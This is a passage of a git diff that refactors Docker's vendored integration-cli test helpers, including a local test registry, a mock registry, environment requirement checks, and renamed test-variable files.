-	tmp, err := ioutil.TempDir("", "registry-test-")
-	if err != nil {
-		return nil, err
-	}
-	template := `version: 0.1
-loglevel: debug
-storage:
-    filesystem:
-        rootdirectory: %s
-http:
-    addr: %s
-%s`
-	var (
-		authTemplate string
-		username     string
-		password     string
-		email        string
-	)
-	switch auth {
-	case "htpasswd":
-		htpasswdPath := filepath.Join(tmp, "htpasswd")
-		// generated with: htpasswd -Bbn testuser testpassword
-		userpasswd := "testuser:$2y$05$sBsSqk0OpSD1uTZkHXc4FeJ0Z70wLQdAX/82UiHuQOKbNbBrzs63m"
-		username = "testuser"
-		password = "testpassword"
-		email = "test@test.org"
-		if err := ioutil.WriteFile(htpasswdPath, []byte(userpasswd), os.FileMode(0644)); err != nil {
-			return nil, err
-		}
-		authTemplate = fmt.Sprintf(`auth:
-    htpasswd:
-        realm: basic-realm
-        path: %s
-`, htpasswdPath)
-	case "token":
-		authTemplate = fmt.Sprintf(`auth:
-    token:
-        realm: %s
-        service: "registry"
-        issuer: "auth-registry"
-        rootcertbundle: "fixtures/registry/cert.pem"
-`, tokenURL)
-	}
-
-	confPath := filepath.Join(tmp, "config.yaml")
-	config, err := os.Create(confPath)
-	if err != nil {
-		return nil, err
-	}
-	defer config.Close()
-
-	if _, err := fmt.Fprintf(config, template, tmp, privateRegistryURL, authTemplate); err != nil {
-		os.RemoveAll(tmp)
-		return nil, err
-	}
-
-	binary := v2binary
-	if schema1 {
-		binary = v2binarySchema1
-	}
-	cmd := exec.Command(binary, confPath)
-	if err := cmd.Start(); err != nil {
-		os.RemoveAll(tmp)
-		if os.IsNotExist(err) {
-			c.Skip(err.Error())
-		}
-		return nil, err
-	}
-	return &testRegistryV2{
-		cmd:      cmd,
-		dir:      tmp,
-		auth:     auth,
-		username: username,
-		password: password,
-		email:    email,
-	}, nil
-}
-
-func (t *testRegistryV2) Ping() error {
-	// We always ping through HTTP for our test registry.
-	resp, err := http.Get(fmt.Sprintf("http://%s/v2/", privateRegistryURL))
-	if err != nil {
-		return err
-	}
-	resp.Body.Close()
-
-	fail := resp.StatusCode != http.StatusOK
-	if t.auth != "" {
-		// unauthorized is a _good_ status when pinging v2/ and it needs auth
-		fail = fail && resp.StatusCode != http.StatusUnauthorized
-	}
-	if fail {
-		return fmt.Errorf("registry ping replied with an unexpected status code %d", resp.StatusCode)
-	}
-	return nil
-}
-
-func (t *testRegistryV2) Close() {
-	t.cmd.Process.Kill()
-	os.RemoveAll(t.dir)
-}
-
-func (t *testRegistryV2) getBlobFilename(blobDigest digest.Digest) string {
-	// Split the digest into its algorithm and hex components.
-	dgstAlg, dgstHex := blobDigest.Algorithm(), blobDigest.Hex()
-
-	// The path to the target blob data looks something like:
-	//   baseDir + "docker/registry/v2/blobs/sha256/a3/a3ed...46d4/data"
-	return fmt.Sprintf("%s/docker/registry/v2/blobs/%s/%s/%s/data", t.dir, dgstAlg, dgstHex[:2], dgstHex)
-}
-
-func (t *testRegistryV2) readBlobContents(c *check.C, blobDigest digest.Digest) []byte {
-	// Load the target manifest blob.
-	manifestBlob, err := ioutil.ReadFile(t.getBlobFilename(blobDigest))
-	if err != nil {
-		c.Fatalf("unable to read blob: %s", err)
-	}
-
-	return manifestBlob
-}
-
-func (t *testRegistryV2) writeBlobContents(c *check.C, blobDigest digest.Digest, data []byte) {
-	if err := ioutil.WriteFile(t.getBlobFilename(blobDigest), data, os.FileMode(0644)); err != nil {
-		c.Fatalf("unable to write malicious data blob: %s", err)
-	}
-}
-
-func (t *testRegistryV2) tempMoveBlobData(c *check.C, blobDigest digest.Digest) (undo func()) {
-	tempFile, err := ioutil.TempFile("", "registry-temp-blob-")
-	if err != nil {
-		c.Fatalf("unable to get temporary blob file: %s", err)
-	}
-	tempFile.Close()
-
-	blobFilename := t.getBlobFilename(blobDigest)
-
-	// Move the existing data file aside, so that we can replace it with a
-	// another blob of data.
-	if err := os.Rename(blobFilename, tempFile.Name()); err != nil {
-		os.Remove(tempFile.Name())
-		c.Fatalf("unable to move data blob: %s", err)
-	}
-
-	return func() {
-		os.Rename(tempFile.Name(), blobFilename)
-		os.Remove(tempFile.Name())
-	}
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/registry_mock.go b/vendor/github.com/docker/docker/integration-cli/registry_mock.go
deleted file mode 100644
index 300bf46425..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/registry_mock.go
+++ /dev/null
@@ -1,55 +0,0 @@
-package main
-
-import (
-	"net/http"
-	"net/http/httptest"
-	"regexp"
-	"strings"
-	"sync"
-
-	"github.com/go-check/check"
-)
-
-type handlerFunc func(w http.ResponseWriter, r *http.Request)
-
-type testRegistry struct {
-	server   *httptest.Server
-	hostport string
-	handlers map[string]handlerFunc
-	mu       sync.Mutex
-}
-
-func (tr *testRegistry) registerHandler(path string, h handlerFunc) {
-	tr.mu.Lock()
-	defer tr.mu.Unlock()
-	tr.handlers[path] = h
-}
-
-func newTestRegistry(c *check.C) (*testRegistry, error) {
-	testReg := &testRegistry{handlers: make(map[string]handlerFunc)}
-
-	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		url := r.URL.String()
-
-		var matched bool
-		var err error
-		for re, function := range testReg.handlers {
-			matched, err = regexp.MatchString(re, url)
-			if err != nil {
-				c.Fatal("Error with handler regexp")
-			}
-			if matched {
-				function(w, r)
-				break
-			}
-		}
-
-		if !matched {
-			c.Fatalf("Unable to match %s with regexp", url)
-		}
-	}))
-
-	testReg.server = ts
-	testReg.hostport = strings.Replace(ts.URL, "http://", "", 1)
-	return testReg, nil
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/requirement/requirement.go b/vendor/github.com/docker/docker/integration-cli/requirement/requirement.go
new file mode 100644
index 0000000000..45a1bcabfd
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/requirement/requirement.go
@@ -0,0 +1,34 @@
+package requirement // import "github.com/docker/docker/integration-cli/requirement"
+
+import (
+	"fmt"
+	"path"
+	"reflect"
+	"runtime"
+	"strings"
+)
+
+// SkipT is the interface required to skip tests
+type SkipT interface {
+	Skip(reason string)
+}
+
+// Test represent a function that can be used as a requirement validation.
+type Test func() bool
+
+// Is checks if the environment satisfies the requirements
+// for the test to run or skips the tests.
+func Is(s SkipT, requirements ...Test) {
+	for _, r := range requirements {
+		isValid := r()
+		if !isValid {
+			requirementFunc := runtime.FuncForPC(reflect.ValueOf(r).Pointer()).Name()
+			s.Skip(fmt.Sprintf("unmatched requirement %s", extractRequirement(requirementFunc)))
+		}
+	}
+}
+
+func extractRequirement(requirementFunc string) string {
+	requirement := path.Base(requirementFunc)
+	return strings.SplitN(requirement, ".", 2)[1]
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/requirements.go b/vendor/github.com/docker/docker/integration-cli/requirements.go
deleted file mode 100644
index abddb9fe4f..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/requirements.go
+++ /dev/null
@@ -1,243 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"io/ioutil"
-	"net/http"
-	"os"
-	"os/exec"
-	"strings"
-	"time"
-
-	"github.com/go-check/check"
-)
-
-type testCondition func() bool
-
-type testRequirement struct {
-	Condition   testCondition
-	SkipMessage string
-}
-
-// List test requirements
-var (
-	DaemonIsWindows = testRequirement{
-		func() bool { return daemonPlatform == "windows" },
-		"Test requires a Windows daemon",
-	}
-	DaemonIsLinux = testRequirement{
-		func() bool { return daemonPlatform == "linux" },
-		"Test requires a Linux daemon",
-	}
-	ExperimentalDaemon = testRequirement{
-		func() bool { return experimentalDaemon },
-		"Test requires an experimental daemon",
-	}
-	NotExperimentalDaemon = testRequirement{
-		func() bool { return !experimentalDaemon },
-		"Test requires a non experimental daemon",
-	}
-	IsAmd64 = testRequirement{
-		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") == "amd64" },
-		"Test requires a daemon running on amd64",
-	}
-	NotArm = testRequirement{
-		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") != "arm" },
-		"Test requires a daemon not running on ARM",
-	}
-	NotArm64 = testRequirement{
-		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") != "arm64" },
-		"Test requires a daemon not running on arm64",
-	}
-	NotPpc64le = testRequirement{
-		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") != "ppc64le" },
-		"Test requires a daemon not running on ppc64le",
-	}
-	NotS390X = testRequirement{
-		func() bool { return os.Getenv("DOCKER_ENGINE_GOARCH") != "s390x" },
-		"Test requires a daemon not running on s390x",
-	}
-	SameHostDaemon = testRequirement{
-		func() bool { return isLocalDaemon },
-		"Test requires docker daemon to run on the same machine as CLI",
-	}
-	UnixCli = testRequirement{
-		func() bool { return isUnixCli },
-		"Test requires posix utilities or functionality to run.",
-	}
-	ExecSupport = testRequirement{
-		func() bool { return supportsExec },
-		"Test requires 'docker exec' capabilities on the tested daemon.",
-	}
-	Network = testRequirement{
-		func() bool {
-			// Set a timeout on the GET at 15s
-			var timeout = time.Duration(15 * time.Second)
-			var url = "https://hub.docker.com"
-
-			client := http.Client{
-				Timeout: timeout,
-			}
-
-			resp, err := client.Get(url)
-			if err != nil && strings.Contains(err.Error(), "use of closed network connection") {
-				panic(fmt.Sprintf("Timeout for GET request on %s", url))
-			}
-			if resp != nil {
-				resp.Body.Close()
-			}
-			return err == nil
-		},
-		"Test requires network availability, environment variable set to none to run in a non-network enabled mode.",
-	}
-	Apparmor = testRequirement{
-		func() bool {
-			buf, err := ioutil.ReadFile("/sys/module/apparmor/parameters/enabled")
-			return err == nil && len(buf) > 1 && buf[0] == 'Y'
-		},
-		"Test requires apparmor is enabled.",
-	}
-	RegistryHosting = testRequirement{
-		func() bool {
-			// for now registry binary is built only if we're running inside
-			// container through `make test`. Figure that out by testing if
-			// registry binary is in PATH.
-			_, err := exec.LookPath(v2binary)
-			return err == nil
-		},
-		fmt.Sprintf("Test requires an environment that can host %s in the same host", v2binary),
-	}
-	NotaryHosting = testRequirement{
-		func() bool {
-			// for now notary binary is built only if we're running inside
-			// container through `make test`. Figure that out by testing if
-			// notary-server binary is in PATH.
-			_, err := exec.LookPath(notaryServerBinary)
-			return err == nil
-		},
-		fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary),
-	}
-	NotaryServerHosting = testRequirement{
-		func() bool {
-			// for now notary-server binary is built only if we're running inside
-			// container through `make test`. Figure that out by testing if
-			// notary-server binary is in PATH.
-			_, err := exec.LookPath(notaryServerBinary)
-			return err == nil
-		},
-		fmt.Sprintf("Test requires an environment that can host %s in the same host", notaryServerBinary),
-	}
-	NotOverlay = testRequirement{
-		func() bool {
-			return !strings.HasPrefix(daemonStorageDriver, "overlay")
-		},
-		"Test requires underlying root filesystem not be backed by overlay.",
-	}
-
-	Devicemapper = testRequirement{
-		func() bool {
-			return strings.HasPrefix(daemonStorageDriver, "devicemapper")
-		},
-		"Test requires underlying root filesystem to be backed by devicemapper.",
-	}
-
-	IPv6 = testRequirement{
-		func() bool {
-			cmd := exec.Command("test", "-f", "/proc/net/if_inet6")
-
-			if err := cmd.Run(); err != nil {
-				return true
-			}
-			return false
-		},
-		"Test requires support for IPv6",
-	}
-	UserNamespaceROMount = testRequirement{
-		func() bool {
-			// quick case--userns not enabled in this test run
-			if os.Getenv("DOCKER_REMAP_ROOT") == "" {
-				return true
-			}
-			if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil {
-				return false
-			}
-			return true
-		},
-		"Test cannot be run if user namespaces enabled but readonly mounts fail on this kernel.",
-	}
-	UserNamespaceInKernel = testRequirement{
-		func() bool {
-			if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) {
-				/*
-				 * This kernel-provided file only exists if user namespaces are
-				 * supported
-				 */
-				return false
-			}
-
-			// We need extra check on redhat based distributions
-			if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil {
-				defer f.Close()
-				b := make([]byte, 1)
-				_, _ = f.Read(b)
-				if string(b) == "N" {
-					return false
-				}
-				return true
-			}
-
-			return true
-		},
-		"Kernel must have user namespaces configured and enabled.",
-	}
-	NotUserNamespace = testRequirement{
-		func() bool {
-			root := os.Getenv("DOCKER_REMAP_ROOT")
-			if root != "" {
-				return false
-			}
-			return true
-		},
-		"Test cannot be run when remapping root",
-	}
-	IsPausable = testRequirement{
-		func() bool {
-			if daemonPlatform == "windows" {
-				return isolation == "hyperv"
-			}
-			return true
-		},
-		"Test requires containers are pausable.",
-	}
-	NotPausable = testRequirement{
-		func() bool {
-			if daemonPlatform == "windows" {
-				return isolation == "process"
-			}
-			return false
-		},
-		"Test requires containers are not pausable.",
-	}
-	IsolationIsHyperv = testRequirement{
-		func() bool {
-			return daemonPlatform == "windows" && isolation == "hyperv"
-		},
-		"Test requires a Windows daemon running default isolation mode of hyperv.",
-	}
-	IsolationIsProcess = testRequirement{
-		func() bool {
-			return daemonPlatform == "windows" && isolation == "process"
-		},
-		"Test requires a Windows daemon running default isolation mode of process.",
-	}
-)
-
-// testRequires checks if the environment satisfies the requirements
-// for the test to run or skips the tests.
-func testRequires(c *check.C, requirements ...testRequirement) {
-	for _, r := range requirements {
-		if !r.Condition() {
-			c.Skip(r.SkipMessage)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_test.go b/vendor/github.com/docker/docker/integration-cli/requirements_test.go
new file mode 100644
index 0000000000..28be59cd2c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/requirements_test.go
@@ -0,0 +1,219 @@
+package main
+
+import (
+	"context"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"os"
+	"os/exec"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/requirement"
+	"github.com/docker/docker/internal/test/registry"
+)
+
+func ArchitectureIsNot(arch string) bool {
+	return os.Getenv("DOCKER_ENGINE_GOARCH") != arch
+}
+
+func DaemonIsWindows() bool {
+	return testEnv.OSType == "windows"
+}
+
+func DaemonIsWindowsAtLeastBuild(buildNumber int) func() bool {
+	return func() bool {
+		if testEnv.OSType != "windows" {
+			return false
+		}
+		version := testEnv.DaemonInfo.KernelVersion
+		numVersion, _ := strconv.Atoi(strings.Split(version, " ")[1])
+		return numVersion >= buildNumber
+	}
+}
+
+func DaemonIsLinux() bool {
+	return testEnv.OSType == "linux"
+}
+
+func MinimumAPIVersion(version string) func() bool {
+	return func() bool {
+		return versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), version)
+	}
+}
+
+func OnlyDefaultNetworks() bool {
+	cli, err := client.NewEnvClient()
+	if err != nil {
+		return false
+	}
+	networks, err := cli.NetworkList(context.TODO(), types.NetworkListOptions{})
+	if err != nil || len(networks) > 0 {
+		return false
+	}
+	return true
+}
+
+// Deprecated: use skip.If(t, !testEnv.DaemonInfo.ExperimentalBuild)
+func ExperimentalDaemon() bool {
+	return testEnv.DaemonInfo.ExperimentalBuild
+}
+
+func IsAmd64() bool {
+	return os.Getenv("DOCKER_ENGINE_GOARCH") == "amd64"
+}
+
+func NotArm() bool {
+	return ArchitectureIsNot("arm")
+}
+
+func NotArm64() bool {
+	return ArchitectureIsNot("arm64")
+}
+
+func NotPpc64le() bool {
+	return ArchitectureIsNot("ppc64le")
+}
+
+func NotS390X() bool {
+	return ArchitectureIsNot("s390x")
+}
+
+func SameHostDaemon() bool {
+	return testEnv.IsLocalDaemon()
+}
+
+func UnixCli() bool {
+	return isUnixCli
+}
+
+func ExecSupport() bool {
+	return supportsExec
+}
+
+func Network() bool {
+	// Set a timeout on the GET at 15s
+	var timeout = time.Duration(15 * time.Second)
+	var url = "https://hub.docker.com"
+
+	client := http.Client{
+		Timeout: timeout,
+	}
+
+	resp, err := client.Get(url)
+	if err != nil && strings.Contains(err.Error(), "use of closed network connection") {
+		panic(fmt.Sprintf("Timeout for GET request on %s", url))
+	}
+	if resp != nil {
+		resp.Body.Close()
+	}
+	return err == nil
+}
+
+func Apparmor() bool {
+	if strings.HasPrefix(testEnv.DaemonInfo.OperatingSystem, "SUSE Linux Enterprise Server ") {
+		return false
+	}
+	buf, err := ioutil.ReadFile("/sys/module/apparmor/parameters/enabled")
+	return err == nil && len(buf) > 1 && buf[0] == 'Y'
+}
+
+func Devicemapper() bool {
+	return strings.HasPrefix(testEnv.DaemonInfo.Driver, "devicemapper")
+}
+
+func IPv6() bool {
+	cmd := exec.Command("test", "-f", "/proc/net/if_inet6")
+	return cmd.Run() != nil
+}
+
+func UserNamespaceROMount() bool {
+	// quick case--userns not enabled in this test run
+	if os.Getenv("DOCKER_REMAP_ROOT") == "" {
+		return true
+	}
+	if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil {
+		return false
+	}
+	return true
+}
+
+func NotUserNamespace() bool {
+	root := os.Getenv("DOCKER_REMAP_ROOT")
+	return root == ""
+}
+
+func UserNamespaceInKernel() bool {
+	if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) {
+		/*
+		 * This kernel-provided file only exists if user namespaces are
+		 * supported
+		 */
+		return false
+	}
+
+	// We need extra check on redhat based distributions
+	if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil {
+		defer f.Close()
+		b := make([]byte, 1)
+		_, _ = f.Read(b)
+		return string(b) != "N"
+	}
+
+	return true
+}
+
+func IsPausable() bool {
+	if testEnv.OSType == "windows" {
+		return testEnv.DaemonInfo.Isolation == "hyperv"
+	}
+	return true
+}
+
+func NotPausable() bool {
+	if testEnv.OSType == "windows" {
+		return testEnv.DaemonInfo.Isolation == "process"
+	}
+	return false
+}
+
+func IsolationIs(expectedIsolation string) bool {
+	return testEnv.OSType == "windows" && string(testEnv.DaemonInfo.Isolation) == expectedIsolation
+}
+
+func IsolationIsHyperv() bool {
+	return IsolationIs("hyperv")
+}
+
+func IsolationIsProcess() bool {
+	return IsolationIs("process")
+}
+
+// RegistryHosting returns wether the host can host a registry (v2) or not
+func RegistryHosting() bool {
+	// for now registry binary is built only if we're running inside
+	// container through `make test`. Figure that out by testing if
+	// registry binary is in PATH.
+	_, err := exec.LookPath(registry.V2binary)
+	return err == nil
+}
+
+func SwarmInactive() bool {
+	return testEnv.DaemonInfo.Swarm.LocalNodeState == swarm.LocalNodeStateInactive
+}
+
+func TODOBuildkit() bool {
+	return os.Getenv("DOCKER_BUILDKIT") == ""
+}
+
+// testRequires checks if the environment satisfies the requirements
+// for the test to run or skips the tests.
+func testRequires(c requirement.SkipT, requirements ...requirement.Test) {
+	requirement.Is(c, requirements...)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go
deleted file mode 100644
index ef017d8a76..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go
+++ /dev/null
@@ -1,159 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"bytes"
-	"io/ioutil"
-	"os/exec"
-	"strings"
-
-	"github.com/docker/docker/pkg/parsers/kernel"
-	"github.com/docker/docker/pkg/sysinfo"
-)
-
-var (
-	// SysInfo stores information about which features a kernel supports.
-	SysInfo      *sysinfo.SysInfo
-	cpuCfsPeriod = testRequirement{
-		func() bool {
-			return SysInfo.CPUCfsPeriod
-		},
-		"Test requires an environment that supports cgroup cfs period.",
-	}
-	cpuCfsQuota = testRequirement{
-		func() bool {
-			return SysInfo.CPUCfsQuota
-		},
-		"Test requires an environment that supports cgroup cfs quota.",
-	}
-	cpuShare = testRequirement{
-		func() bool {
-			return SysInfo.CPUShares
-		},
-		"Test requires an environment that supports cgroup cpu shares.",
-	}
-	oomControl = testRequirement{
-		func() bool {
-			return SysInfo.OomKillDisable
-		},
-		"Test requires Oom control enabled.",
-	}
-	pidsLimit = testRequirement{
-		func() bool {
-			return SysInfo.PidsLimit
-		},
-		"Test requires pids limit enabled.",
-	}
-	kernelMemorySupport = testRequirement{
-		func() bool {
-			return SysInfo.KernelMemory
-		},
-		"Test requires an environment that supports cgroup kernel memory.",
-	}
-	memoryLimitSupport = testRequirement{
-		func() bool {
-			return SysInfo.MemoryLimit
-		},
-		"Test requires an environment that supports cgroup memory limit.",
-	}
-	memoryReservationSupport = testRequirement{
-		func() bool {
-			return SysInfo.MemoryReservation
-		},
-		"Test requires an environment that supports cgroup memory reservation.",
-	}
-	swapMemorySupport = testRequirement{
-		func() bool {
-			return SysInfo.SwapLimit
-		},
-		"Test requires an environment that supports cgroup swap memory limit.",
-	}
-	memorySwappinessSupport = testRequirement{
-		func() bool {
-			return SysInfo.MemorySwappiness
-		},
-		"Test requires an environment that supports cgroup memory swappiness.",
-	}
-	blkioWeight = testRequirement{
-		func() bool {
-			return SysInfo.BlkioWeight
-		},
-		"Test requires an environment that supports blkio weight.",
-	}
-	cgroupCpuset = testRequirement{
-		func() bool {
-			return SysInfo.Cpuset
-		},
-		"Test requires an environment that supports cgroup cpuset.",
-	}
-	seccompEnabled = testRequirement{
-		func() bool {
-			return supportsSeccomp && SysInfo.Seccomp
-		},
-		"Test requires that seccomp support be enabled in the daemon.",
-	}
-	bridgeNfIptables = testRequirement{
-		func() bool {
-			return !SysInfo.BridgeNFCallIPTablesDisabled
-		},
-		"Test requires that bridge-nf-call-iptables support be enabled in the daemon.",
-	}
-	bridgeNfIP6tables = testRequirement{
-		func() bool {
-			return !SysInfo.BridgeNFCallIP6TablesDisabled
-		},
-		"Test requires that bridge-nf-call-ip6tables support be enabled in the daemon.",
-	}
-	unprivilegedUsernsClone = testRequirement{
-		func() bool {
-			content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone")
-			if err == nil && strings.Contains(string(content), "0") {
-				return false
-			}
-			return true
-		},
-		"Test cannot be run with 'sysctl kernel.unprivileged_userns_clone' = 0",
-	}
-	ambientCapabilities = testRequirement{
-		func() bool {
-			content, err := ioutil.ReadFile("/proc/self/status")
-			if err == nil && strings.Contains(string(content), "CapAmb:") {
-				return true
-			}
-			return false
-		},
-		"Test cannot be run without a kernel (4.3+) supporting ambient capabilities",
-	}
-	overlayFSSupported = testRequirement{
-		func() bool {
-			cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems")
-			out, err := cmd.CombinedOutput()
-			if err != nil {
-				return false
-			}
-			return bytes.Contains(out, []byte("overlay\n"))
-		},
-		"Test cannot be run without suppport for overlayfs",
-	}
-	overlay2Supported = testRequirement{
-		func() bool {
-			if !overlayFSSupported.Condition() {
-				return false
-			}
-
-			daemonV, err := kernel.ParseRelease(daemonKernelVersion)
-			if err != nil {
-				return false
-			}
-			requiredV := kernel.VersionInfo{Kernel: 4}
-			return kernel.CompareKernelVersion(*daemonV, requiredV) > -1
-
-		},
-		"Test cannot be run without overlay2 support (kernel 4.0+)",
-	}
-)
-
-func init() {
-	SysInfo = sysinfo.New(true)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go b/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go
new file mode 100644
index 0000000000..7c594f7db4
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go
@@ -0,0 +1,117 @@
+// +build !windows
+
+package main
+
+import (
+	"bytes"
+	"io/ioutil"
+	"os/exec"
+	"strings"
+
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/docker/docker/pkg/sysinfo"
+)
+
+var (
+	// SysInfo stores information about which features a kernel supports.
+	SysInfo *sysinfo.SysInfo
+)
+
+func cpuCfsPeriod() bool {
+	return testEnv.DaemonInfo.CPUCfsPeriod
+}
+
+func cpuCfsQuota() bool {
+	return testEnv.DaemonInfo.CPUCfsQuota
+}
+
+func cpuShare() bool {
+	return testEnv.DaemonInfo.CPUShares
+}
+
+func oomControl() bool {
+	return testEnv.DaemonInfo.OomKillDisable
+}
+
+func pidsLimit() bool {
+	return SysInfo.PidsLimit
+}
+
+func kernelMemorySupport() bool {
+	return testEnv.DaemonInfo.KernelMemory
+}
+
+func memoryLimitSupport() bool {
+	return testEnv.DaemonInfo.MemoryLimit
+}
+
+func memoryReservationSupport() bool {
+	return SysInfo.MemoryReservation
+}
+
+func swapMemorySupport() bool {
+	return testEnv.DaemonInfo.SwapLimit
+}
+
+func memorySwappinessSupport() bool {
+	return SameHostDaemon() && SysInfo.MemorySwappiness
+}
+
+func blkioWeight() bool {
+	return SameHostDaemon() && SysInfo.BlkioWeight
+}
+
+func cgroupCpuset() bool {
+	return testEnv.DaemonInfo.CPUSet
+}
+
+func seccompEnabled() bool {
+	return supportsSeccomp && SysInfo.Seccomp
+}
+
+func bridgeNfIptables() bool {
+	return !SysInfo.BridgeNFCallIPTablesDisabled
+}
+
+func bridgeNfIP6tables() bool {
+	return !SysInfo.BridgeNFCallIP6TablesDisabled
+}
+
+func unprivilegedUsernsClone() bool {
+	content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone")
+	return err != nil || !strings.Contains(string(content), "0")
+}
+
+func ambientCapabilities() bool {
+	content, err := ioutil.ReadFile("/proc/self/status")
+	return err != nil || strings.Contains(string(content), "CapAmb:")
+}
+
+func overlayFSSupported() bool {
+	cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems")
+	out, err := cmd.CombinedOutput()
+	if err != nil {
+		return false
+	}
+	return bytes.Contains(out, []byte("overlay\n"))
+}
+
+func overlay2Supported() bool {
+	if !overlayFSSupported() {
+		return false
+	}
+
+	daemonV, err := kernel.ParseRelease(testEnv.DaemonInfo.KernelVersion)
+	if err != nil {
+		return false
+	}
+	requiredV := kernel.VersionInfo{Kernel: 4}
+	return kernel.CompareKernelVersion(*daemonV, requiredV) > -1
+
+}
+
+func init() {
+	if SameHostDaemon() {
+		SysInfo = sysinfo.New(true)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_exec_test.go
similarity index 100%
rename from vendor/github.com/docker/docker/integration-cli/test_vars_exec.go
rename to vendor/github.com/docker/docker/integration-cli/test_vars_exec_test.go
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec_test.go
similarity index 100%
rename from vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go
rename to vendor/github.com/docker/docker/integration-cli/test_vars_noexec_test.go
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp_test.go
similarity index 100%
rename from vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go
rename to vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp_test.go
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp_test.go
similarity index 100%
rename from vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go
rename to vendor/github.com/docker/docker/integration-cli/test_vars_seccomp_test.go
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars.go b/vendor/github.com/docker/docker/integration-cli/test_vars_test.go
similarity index 90%
rename from vendor/github.com/docker/docker/integration-cli/test_vars.go
rename to vendor/github.com/docker/docker/integration-cli/test_vars_test.go
index 97bcddd5f4..82ec58e9e7 100644
--- a/vendor/github.com/docker/docker/integration-cli/test_vars.go
+++ b/vendor/github.com/docker/docker/integration-cli/test_vars_test.go
@@ -4,7 +4,7 @@ package main
 // the command is for a sleeping container based on the daemon platform.
 // The Windows busybox image does not have a `top` command.
 func sleepCommandForDaemonPlatform() []string {
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		return []string{"sleep", "240"}
 	}
 	return []string{"top"}
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go b/vendor/github.com/docker/docker/integration-cli/test_vars_unix_test.go
similarity index 100%
rename from vendor/github.com/docker/docker/integration-cli/test_vars_unix.go
rename to vendor/github.com/docker/docker/integration-cli/test_vars_unix_test.go
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go b/vendor/github.com/docker/docker/integration-cli/test_vars_windows_test.go
similarity index 100%
rename from vendor/github.com/docker/docker/integration-cli/test_vars_windows.go
rename to vendor/github.com/docker/docker/integration-cli/test_vars_windows_test.go
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar b/vendor/github.com/docker/docker/integration-cli/testdata/emptyLayer.tar
similarity index 100%
rename from vendor/github.com/docker/docker/integration-cli/fixtures/load/emptyLayer.tar
rename to vendor/github.com/docker/docker/integration-cli/testdata/emptyLayer.tar
diff --git a/vendor/github.com/docker/docker/integration-cli/trust_server.go b/vendor/github.com/docker/docker/integration-cli/trust_server.go
deleted file mode 100644
index 18876311a1..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/trust_server.go
+++ /dev/null
@@ -1,344 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"io/ioutil"
-	"net"
-	"net/http"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/cliconfig"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/docker/go-connections/tlsconfig"
-	"github.com/go-check/check"
-)
-
-var notaryBinary = "notary"
-var notaryServerBinary = "notary-server"
-
-type keyPair struct {
-	Public  string
-	Private string
-}
-
-type testNotary struct {
-	cmd  *exec.Cmd
-	dir  string
-	keys []keyPair
-}
-
-const notaryHost = "localhost:4443"
-const notaryURL = "https://" + notaryHost
-
-func newTestNotary(c *check.C) (*testNotary, error) {
